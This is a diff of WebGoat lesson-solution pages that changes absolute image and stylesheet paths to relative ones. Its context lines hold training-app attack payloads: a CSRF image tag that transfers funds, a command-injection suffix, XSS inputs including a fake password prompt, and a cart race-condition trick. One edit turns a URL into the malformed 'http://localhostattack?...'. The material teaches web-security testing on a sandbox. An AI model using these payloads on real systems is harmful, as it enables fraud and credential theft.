<v:imagedata src="lesson_solutions/BlindSqlInjection_files/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/BlindSqlInjection_files/image013.jpg" v:shapes="Picture_x0020_1419"><![endif]></span></p>
src="lesson_solutions/BlindSqlInjection_files/image013.jpg" v:shapes="Picture_x0020_1419"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -762,9 +762,9 @@ character is bigger then the value you get an invalid account error message.<o:p
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_1420"
o:spid="_x0000_i1029" type="#_x0000_t75" style='width:480pt;height:276.75pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/BlindSqlInjection_files/image003.png" o:title=""/>
<v:imagedata src="lesson_solutions/BlindSqlInjection_files/image003.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/BlindSqlInjection_files/image014.jpg" v:shapes="Picture_x0020_1420"><![endif]></span></p>
src="lesson_solutions/BlindSqlInjection_files/image014.jpg" v:shapes="Picture_x0020_1420"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -788,9 +788,9 @@ userid=15613) , 1 , 1) ) = 74 );<o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_1421"
o:spid="_x0000_i1028" type="#_x0000_t75" style='width:480pt;height:276.75pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/BlindSqlInjection_files/image005.png" o:title=""/>
<v:imagedata src="lesson_solutions/BlindSqlInjection_files/image005.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/BlindSqlInjection_files/image015.jpg" v:shapes="Picture_x0020_1421"><![endif]></span></p>
src="lesson_solutions/BlindSqlInjection_files/image015.jpg" v:shapes="Picture_x0020_1421"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -823,9 +823,9 @@ o, so you have now Jo.<o:p></o:p></span></p>
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_1422" o:spid="_x0000_i1027"
type="#_x0000_t75" style='width:480pt;height:276.75pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/BlindSqlInjection_files/image007.png" o:title=""/>
<v:imagedata src="lesson_solutions/BlindSqlInjection_files/image007.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/BlindSqlInjection_files/image016.jpg" v:shapes="Picture_x0020_1422"><![endif]></span><span
src="lesson_solutions/BlindSqlInjection_files/image016.jpg" v:shapes="Picture_x0020_1422"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
@ -857,9 +857,9 @@ that you found is Joesph. Enter this in the text field to complete this lesson.<
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_1423"
o:spid="_x0000_i1026" type="#_x0000_t75" style='width:480pt;height:276.75pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/BlindSqlInjection_files/image009.png" o:title=""/>
<v:imagedata src="lesson_solutions/BlindSqlInjection_files/image009.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/BlindSqlInjection_files/image017.jpg" v:shapes="Picture_x0020_1423"><![endif]></span></p>
src="lesson_solutions/BlindSqlInjection_files/image017.jpg" v:shapes="Picture_x0020_1423"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -874,9 +874,9 @@ field-end'></span><![endif]--> Enter the name Joesph<span style='font-family:
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_1424"
o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:276.75pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/BlindSqlInjection_files/image011.png" o:title=""/>
<v:imagedata src="lesson_solutions/BlindSqlInjection_files/image011.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/BlindSqlInjection_files/image018.jpg" v:shapes="Picture_x0020_1424"><![endif]></span></p>
src="lesson_solutions/BlindSqlInjection_files/image018.jpg" v:shapes="Picture_x0020_1424"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC

30
webgoat/main/project/WebContent/lesson_solutions/CSRF.html
View File

@ -9,8 +9,8 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<link rel=File-List href="/WebGoat/lesson_solutions/CSRF_files/filelist.xml">
<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/CSRF_files/editdata.mso">
<link rel=File-List href="lesson_solutions/CSRF_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/CSRF_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
@ -36,8 +36,8 @@ w\:* {behavior:url(#default#VML);}
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="/WebGoat/lesson_solutions/CSRF_files/themedata.thmx">
<link rel=colorSchemeMapping href="/WebGoat/lesson_solutions/CSRF_files/colorschememapping.xml">
<link rel=themeData href="lesson_solutions/CSRF_files/themedata.thmx">
<link rel=colorSchemeMapping href="lesson_solutions/CSRF_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:Zoom>90</w:Zoom>
@ -717,9 +717,9 @@ style='font-family:"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Picture_x0020_105" o:spid="_x0000_i1029" type="#_x0000_t75"
style='width:480pt;height:277.5pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/CSRF_files/image001.png" o:title=""/>
<v:imagedata src="lesson_solutions/CSRF_files/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img border=0 width=640 height=370
src="/WebGoat/lesson_solutions/CSRF_files/image011.jpg" v:shapes="Picture_x0020_105"><![endif]></span></p>
src="lesson_solutions/CSRF_files/image011.jpg" v:shapes="Picture_x0020_105"><![endif]></span></p>
<p class=MsoCaption style='text-align:justify'>Figure <!--[if supportFields]><span
style='mso-element:field-begin'></span><span
@ -758,7 +758,7 @@ mso-fareast-language:JA'>This payload will work:<o:p></o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-family:"Arial","sans-serif";
mso-fareast-language:JA'>&lt;img
src="http://localhost/WebGoat/attack?Screen=81&amp;menu=210&amp;transferFunds=5000"
src="http://localhostattack?Screen=81&amp;menu=210&amp;transferFunds=5000"
width=&quot;1&quot; height=&quot;1&quot; /&gt;<o:p></o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-family:"Arial","sans-serif";
@ -772,9 +772,9 @@ message with the payload.<o:p></o:p></span></p>
style='font-family:"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape
id="Picture_x0020_106" o:spid="_x0000_i1028" type="#_x0000_t75" style='width:480pt;
height:277.5pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/CSRF_files/image003.png" o:title=""/>
<v:imagedata src="lesson_solutions/CSRF_files/image003.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img border=0 width=640 height=370
src="/WebGoat/lesson_solutions/CSRF_files/image012.jpg" v:shapes="Picture_x0020_106"><![endif]></span></p>
src="lesson_solutions/CSRF_files/image012.jpg" v:shapes="Picture_x0020_106"><![endif]></span></p>
<p class=MsoCaption style='text-align:justify'>Figure <!--[if supportFields]><span
style='mso-element:field-begin'></span><span
@ -796,9 +796,9 @@ JA'><o:p>&nbsp;</o:p></span></p>
style='mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_107"
o:spid="_x0000_i1027" type="#_x0000_t75" style='width:480pt;height:277.5pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/CSRF_files/image005.png" o:title=""/>
<v:imagedata src="lesson_solutions/CSRF_files/image005.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img border=0 width=640 height=370
src="/WebGoat/lesson_solutions/CSRF_files/image013.jpg" v:shapes="Picture_x0020_107"><![endif]></span></p>
src="lesson_solutions/CSRF_files/image013.jpg" v:shapes="Picture_x0020_107"><![endif]></span></p>
<p class=MsoCaption style='text-align:justify'>Figure <!--[if supportFields]><span
style='mso-element:field-begin'></span><span
@ -820,9 +820,9 @@ generated when the browers tries to render the image tag.<o:p></o:p></span></p>
style='font-family:"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape
id="Picture_x0020_108" o:spid="_x0000_i1026" type="#_x0000_t75" style='width:481.5pt;
height:344.25pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/CSRF_files/image007.png" o:title=""/>
<v:imagedata src="lesson_solutions/CSRF_files/image007.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img border=0 width=642 height=459
src="/WebGoat/lesson_solutions/CSRF_files/image014.jpg" v:shapes="Picture_x0020_108"><![endif]></span></p>
src="lesson_solutions/CSRF_files/image014.jpg" v:shapes="Picture_x0020_108"><![endif]></span></p>
<p class=MsoCaption style='text-align:justify'>Figure <!--[if supportFields]><span
style='mso-element:field-begin'></span><span
@ -841,9 +841,9 @@ you need to refresh the page to get the green star next to the lesson.<o:p></o:p
style='mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_109"
o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:277.5pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/CSRF_files/image009.png" o:title=""/>
<v:imagedata src="lesson_solutions/CSRF_files/image009.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img border=0 width=640 height=370
src="/WebGoat/lesson_solutions/CSRF_files/image015.jpg" v:shapes="Picture_x0020_109"><![endif]></span></p>
src="lesson_solutions/CSRF_files/image015.jpg" v:shapes="Picture_x0020_109"><![endif]></span></p>
<p class=MsoCaption style='text-align:justify'>Figure <!--[if supportFields]><span
style='mso-element:field-begin'></span><span

4
webgoat/main/project/WebContent/lesson_solutions/ClientSideFiltering.html
View File

@ -3,7 +3,7 @@
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Client Side Filtering</title>
<link rel="stylesheet" type="text/css" href="/WebGoat/lesson_solutions/formate.css">
<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
</head>
<body>
<p><b>Lesson Plan Title:</b> Client Side Filtering</p>
@ -36,7 +36,7 @@ can search for a specific person in Firebug. Make sure you find the hidden table
the information, including the salary and so on. In the same table you will find
Neville.
<img src="/WebGoat/lesson_solutions/ClientSideFiltering_files/clientside_firebug.jpg" alt="Clientside Filtering" /><br>
<img src="lesson_solutions/ClientSideFiltering_files/clientside_firebug.jpg" alt="Clientside Filtering" /><br>
<font size="2"><b>Inspect HTML on Firebug</b></font>
<p>

4
webgoat/main/project/WebContent/lesson_solutions/ClientSideValidation.html
View File

@ -4,7 +4,7 @@
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Insecure Client Storage</title>
<link rel="stylesheet" type="text/css"
href="/WebGoat/lesson_solutions/formate.css">
href="lesson_solutions/formate.css">
</head>
<body>
<p><b>Lesson Plan Title:</b> Insecure Client Storage</p>
@ -39,7 +39,7 @@ but stops at the breakpoint. On the right side you see the parameters
and there values. Now use the step over symbol or F10. Now you can read
the clear text of decrypted:
<br><br>
<img src="/WebGoat/lesson_solutions/ClientSideValidation_files/ClientSideValidation_stage1.png" width=450px alt="Stage 1" />
<img src="lesson_solutions/ClientSideValidation_files/ClientSideValidation_stage1.png" width=450px alt="Stage 1" />
<br>
<b><font size="2">Figure 1 Firebug in action</font></b>

24
webgoat/main/project/WebContent/lesson_solutions/CommandInjection.html
View File

@ -9,8 +9,8 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<link rel=File-List href="/WebGoat/lesson_solutions/CommandInjection_files/filelist.xml">
<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/CommandInjection_files/editdata.mso">
<link rel=File-List href="lesson_solutions/CommandInjection_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/CommandInjection_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
@ -36,9 +36,9 @@ w\:* {behavior:url(#default#VML);}
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="/WebGoat/lesson_solutions/CommandInjection_files/themedata.thmx">
<link rel=themeData href="lesson_solutions/CommandInjection_files/themedata.thmx">
<link rel=colorSchemeMapping
href="/WebGoat/lesson_solutions/CommandInjection_files/colorschememapping.xml">
href="lesson_solutions/CommandInjection_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:TrackMoves>false</w:TrackMoves>
@ -643,9 +643,9 @@ should be able to execute any command on the hosting OS.<o:p></o:p></span></p>
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Picture_x0020_1375" o:spid="_x0000_i1028" type="#_x0000_t75"
style='width:480pt;height:276.75pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/CommandInjection_files/image001.png" o:title=""/>
<v:imagedata src="lesson_solutions/CommandInjection_files/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/CommandInjection_files/image007.jpg" v:shapes="Picture_x0020_1375"><![endif]></span></p>
src="lesson_solutions/CommandInjection_files/image007.jpg" v:shapes="Picture_x0020_1375"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -670,9 +670,9 @@ lesson from the drop-down box and click on "View".<o:p></o:p></span></p>
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_1376" o:spid="_x0000_i1027"
type="#_x0000_t75" style='width:480pt;height:276.75pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/CommandInjection_files/image001.png" o:title=""/>
<v:imagedata src="lesson_solutions/CommandInjection_files/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/CommandInjection_files/image007.jpg" v:shapes="Picture_x0020_1376"><![endif]></span><span
src="lesson_solutions/CommandInjection_files/image007.jpg" v:shapes="Picture_x0020_1376"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
@ -687,9 +687,9 @@ request with WebScarab when you click on "View". Append " &amp; netstat &minus;a
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_1377"
o:spid="_x0000_i1026" type="#_x0000_t75" style='width:459.75pt;height:362.25pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/CommandInjection_files/image003.png" o:title=""/>
<v:imagedata src="lesson_solutions/CommandInjection_files/image003.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=613 height=483
src="/WebGoat/lesson_solutions/CommandInjection_files/image008.jpg" v:shapes="Picture_x0020_1377"><![endif]></span></p>
src="lesson_solutions/CommandInjection_files/image008.jpg" v:shapes="Picture_x0020_1377"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -708,9 +708,9 @@ contains the output of the command netstat and ipconfig.<o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_1378"
o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:276.75pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/CommandInjection_files/image005.png" o:title=""/>
<v:imagedata src="lesson_solutions/CommandInjection_files/image005.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/CommandInjection_files/image009.jpg" v:shapes="Picture_x0020_1378"><![endif]></span></p>
src="lesson_solutions/CommandInjection_files/image009.jpg" v:shapes="Picture_x0020_1378"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC

8
webgoat/main/project/WebContent/lesson_solutions/ConcurrencyCart.html
View File

@ -3,7 +3,7 @@
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Shopping Cart Concurrency Flaw</title>
<link rel="stylesheet" type="text/css" href="/WebGoat/lesson_solutions/formate.css">
<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
</head>
<body>
<p><b>Lesson Plan Title:</b> Shopping Cart Concurrency Flaw</p>
@ -19,13 +19,13 @@ For this exercise, your mission is to exploit the concurrency issue which will a
<b>Solution:</b><br/><br/>
1. Open a new browser window on the same page.<br/><br/>
2. In window A you choose a low cost item and click "Purchase".<br/><br/>
<img src="/WebGoat/lesson_solutions/ConcurrencyCart_files/image001.jpg"><br/>
<img src="lesson_solutions/ConcurrencyCart_files/image001.jpg"><br/>
<font size="2"><b>Window A</b></font><br/><br/><br/>
3. In window B you choose the a high cost item you want to buy and click "update cart". The variable of the price has been overwritten now.<br/><br/>
<img src="/WebGoat/lesson_solutions/ConcurrencyCart_files/image002.jpg"><br/>
<img src="lesson_solutions/ConcurrencyCart_files/image002.jpg"><br/>
<font size="2"><b>Window B</b></font><br/><br/><br/>
4. In window A you can click click "Confirm" and you bought your item for a lower price.<br/><br/>
<img src="/WebGoat/lesson_solutions/ConcurrencyCart_files/image003.jpg"><br/>
<img src="lesson_solutions/ConcurrencyCart_files/image003.jpg"><br/>
<font size="2"><b>Window A Success</b></font><br/>
<br><br><br>
</body>

34
webgoat/main/project/WebContent/lesson_solutions/DOMInjection.html
View File

@ -9,8 +9,8 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<link rel=File-List href="/WebGoat/lesson_solutions/DOMInjection_files/filelist.xml">
<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/DOMInjection_files/editdata.mso">
<link rel=File-List href="lesson_solutions/DOMInjection_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/DOMInjection_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
@ -36,8 +36,8 @@ w\:* {behavior:url(#default#VML);}
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="/WebGoat/lesson_solutions/DOMInjection_files/themedata.thmx">
<link rel=colorSchemeMapping href="/WebGoat/lesson_solutions/DOMInjection_files/colorschememapping.xml">
<link rel=themeData href="lesson_solutions/DOMInjection_files/themedata.thmx">
<link rel=colorSchemeMapping href="lesson_solutions/DOMInjection_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:Zoom>90</w:Zoom>
@ -664,9 +664,9 @@ validation process works.<o:p></o:p></span></p>
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Picture_x0020_49" o:spid="_x0000_i1030" type="#_x0000_t75"
style='width:480pt;height:277.5pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/DOMInjection_files/image001.png" o:title=""/>
<v:imagedata src="lesson_solutions/DOMInjection_files/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/DOMInjection_files/image002.jpg" v:shapes="Picture_x0020_49"><![endif]></span></p>
src="lesson_solutions/DOMInjection_files/image002.jpg" v:shapes="Picture_x0020_49"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -695,7 +695,7 @@ validate() {<o:p></o:p></span></p>
= document.getElementById('key');<o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>var url =
'/WebGoat/attack?Screen=80&amp;menu=1150&amp;from=ajax&amp;key=' +
'attack?Screen=80&amp;menu=1150&amp;from=ajax&amp;key=' +
encodeURIComponent(keyField.value);<o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>if (typeof
@ -765,9 +765,9 @@ in WebScarab.<o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_50"
o:spid="_x0000_i1029" type="#_x0000_t75" style='width:481.5pt;height:345pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/DOMInjection_files/image003.png" o:title=""/>
<v:imagedata src="lesson_solutions/DOMInjection_files/image003.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=642 height=460
src="/WebGoat/lesson_solutions/DOMInjection_files/image004.jpg" v:shapes="Picture_x0020_50"><![endif]></span></p>
src="lesson_solutions/DOMInjection_files/image004.jpg" v:shapes="Picture_x0020_50"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -781,9 +781,9 @@ field-end'></span><![endif]--> HTTP Request</p>
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_51" o:spid="_x0000_i1028"
type="#_x0000_t75" style='width:481.5pt;height:345pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/DOMInjection_files/image005.png" o:title=""/>
<v:imagedata src="lesson_solutions/DOMInjection_files/image005.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=642 height=460
src="/WebGoat/lesson_solutions/DOMInjection_files/image006.jpg" v:shapes="Picture_x0020_51"><![endif]></span></p>
src="lesson_solutions/DOMInjection_files/image006.jpg" v:shapes="Picture_x0020_51"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -802,9 +802,9 @@ reply and replace the body with document.forms[0].SUBMIT.disabled = false;<o:p><
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_52"
o:spid="_x0000_i1027" type="#_x0000_t75" style='width:481.5pt;height:345pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/DOMInjection_files/image007.png" o:title=""/>
<v:imagedata src="lesson_solutions/DOMInjection_files/image007.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=642 height=460
src="/WebGoat/lesson_solutions/DOMInjection_files/image008.jpg" v:shapes="Picture_x0020_52"><![endif]></span></p>
src="lesson_solutions/DOMInjection_files/image008.jpg" v:shapes="Picture_x0020_52"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -822,9 +822,9 @@ field-end'></span><![endif]--> Updated HTTP Response</p>
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_53" o:spid="_x0000_i1026"
type="#_x0000_t75" style='width:480pt;height:277.5pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/DOMInjection_files/image009.png" o:title=""/>
<v:imagedata src="lesson_solutions/DOMInjection_files/image009.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/DOMInjection_files/image010.jpg" v:shapes="Picture_x0020_53"><![endif]></span></p>
src="lesson_solutions/DOMInjection_files/image010.jpg" v:shapes="Picture_x0020_53"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -838,9 +838,9 @@ field-end'></span><![endif]--> Activate! Button is enabled</p>
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_54" o:spid="_x0000_i1025"
type="#_x0000_t75" style='width:480pt;height:277.5pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/DOMInjection_files/image011.png" o:title=""/>
<v:imagedata src="lesson_solutions/DOMInjection_files/image011.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/DOMInjection_files/image012.jpg" v:shapes="Picture_x0020_54"><![endif]></span></p>
src="lesson_solutions/DOMInjection_files/image012.jpg" v:shapes="Picture_x0020_54"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC

10
webgoat/main/project/WebContent/lesson_solutions/DOMXSS.html
View File

@ -3,7 +3,7 @@
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>DOM Based Cross Site Scripting (XSS)</title>
<link rel="stylesheet" type="text/css" href="/WebGoat/lesson_solutions/formate.css">
<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
</head>
<body>
<p><b>Lesson Plan Title:</b> DOM Based Cross Site Scripting (XSS)</p>
@ -18,16 +18,16 @@ For this exercise, your mission is to use this vulnerability to inject malicious
<b>Solution:</b><br/><br/>
Stage 1: Enter "&lt;IMG SRC="images/logos/owasp.jpg"/&gt;" and submit the solution.<br/><br/>
<img src="/WebGoat/lesson_solutions/DOMXSS_files/image001.jpg"><br/>
<img src="lesson_solutions/DOMXSS_files/image001.jpg"><br/>
<font size="2"><b>Stage 1 result</b></font><br/><br/><br/>
Stage 2: Enter "&lt;img src=x onerror=;;alert('XSS') /&gt;" and submit the solution.<br/><br/>
<img src="/WebGoat/lesson_solutions/DOMXSS_files/image002.jpg"><br/>
<img src="lesson_solutions/DOMXSS_files/image002.jpg"><br/>
<font size="2"><b>Stage 2 result</b></font><br/><br/><br/>
Stage 3: Enter "&lt;IFRAME SRC="javascript:alert('XSS');"&gt;&lt;/IFRAME&gt;" and submit the solution.<br/><br/>
<img src="/WebGoat/lesson_solutions/DOMXSS_files/image003.jpg"><br/>
<img src="lesson_solutions/DOMXSS_files/image003.jpg"><br/>
<font size="2"><b>Stage 3 result</b></font><br/><br/><br/>
Stage 4: Enter "Please enter your password:&lt;BR&gt;&lt;input type = "password" name="pass"/&gt;&lt;button onClick="javascript:alert('I have your password: ' + pass.value);"&gt;Submit&lt;/button&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt; &lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;" and submit the solution.<br/><br/>
<img src="/WebGoat/lesson_solutions/DOMXSS_files/image004.jpg"><br/>
<img src="lesson_solutions/DOMXSS_files/image004.jpg"><br/>
<font size="2"><b>Stage 4 result</b></font><br/><br/><br/>
Stage 5: You have to use the JavaScript escape.js for the input.<br/>
You will find the JavaScripts in tomcat\webapps\WebGoat\javascript ( Standart Version ) or in WebContent\javascript ( Developer Version ).<br/>

16
webgoat/main/project/WebContent/lesson_solutions/DOS_Login.html
View File

@ -9,8 +9,8 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<link rel=File-List href="/WebGoat/lesson_solutions/DOS_Login_files/filelist.xml">
<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/DOS_Login_files/editdata.mso">
<link rel=File-List href="lesson_solutions/DOS_Login_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/DOS_Login_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
@ -36,8 +36,8 @@ w\:* {behavior:url(#default#VML);}
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="/WebGoat/lesson_solutions/DOS_Login_files/themedata.thmx">
<link rel=colorSchemeMapping href="/WebGoat/lesson_solutions/DOS_Login_files/colorschememapping.xml">
